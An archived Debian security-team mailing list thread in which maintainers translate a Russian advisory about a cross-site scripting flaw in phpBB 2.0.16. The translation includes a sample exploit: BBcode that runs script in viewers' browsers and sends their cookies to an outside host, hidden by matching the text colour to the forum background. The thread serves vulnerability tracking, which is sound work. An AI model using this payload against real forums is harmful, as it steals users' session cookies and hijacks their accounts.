Secure testing team - Mar 2006 - Anyone speaking Russian among you?

On Wed, Jul 06, 2005 at 11:20:45AM +0200, Moritz Muehlenhoff
wrote:
> Hi,
> These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
> they are written in Russian:
> http://www.securitylab.ru/55612.html
  Cross-site scripting with phpbb forums
  Program: phpbb 2.0.16
  Severity: low
  Exploit available: yes
  Description: a vulnerability is phpbb forum allows a remote user to carry
  out an XSS attack.

  The remote user can insert a specially constructed combination of BB tags
  into forum messages to cause arbitrary code execution in the browser of a
  user that views the malicious message.  The vulnerability can be used to
  steal the user''s private information (session IDs or cookies).

  Sample exploit:

  [color=#EFEFEF][url]www.ut[url=www.s=''''
  style=''font-size:0;color:#EFEFEF
  ''style=''top:expression(eval(this.sss));
  ''sss=`i=new/**/Image();
  i.src=''http://antichat.ru/cgi-bin/s.jpg?''+document.cookie;
  this.sss=null`style=''font-size:0;]
  [/url][/url]''[/color]

  Replace ????_???? (BACKGROUND_COLOR) with the value for the message
  background used by this forum skin.  For the standard subsilver this is
  #EFEFEF.  This is done so that the introduction of the exploit is not
  noticeable to the naked eye in other browsers where the code doesn''t
work,
  yadda yadda.

  Author''s URL: http://www.phpbb.com

  Solution: there is no fix for this vulnerability at present.

Curiously, this seems to be nothing more than a bad copy from the second
advisory, since there is obviously no occurence of ????_???? in the sample
exploit provided...
> http://antichat.ru/txt/phpbb/
Neither provides any information about a fix.  The second one does go into
more detail, but I''d imagine the sample exploit is the important part
and
the rest is ignorable.  If not, Babelfish seems to be a surprisingly usable
Russian-English translation dictionary -- I wonder why they can''t do
this
good a job on the other languages. :-)

-- 
Steve Langasek
postmodern programmer
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url :
http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20050706/4fc37995/attachment.pgp

Hi,
These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
they are written in Russian:
http://www.securitylab.ru/55612.html
http://antichat.ru/txt/phpbb/

[I''ve already send the phpbb maintainer a pointer]

        Moritz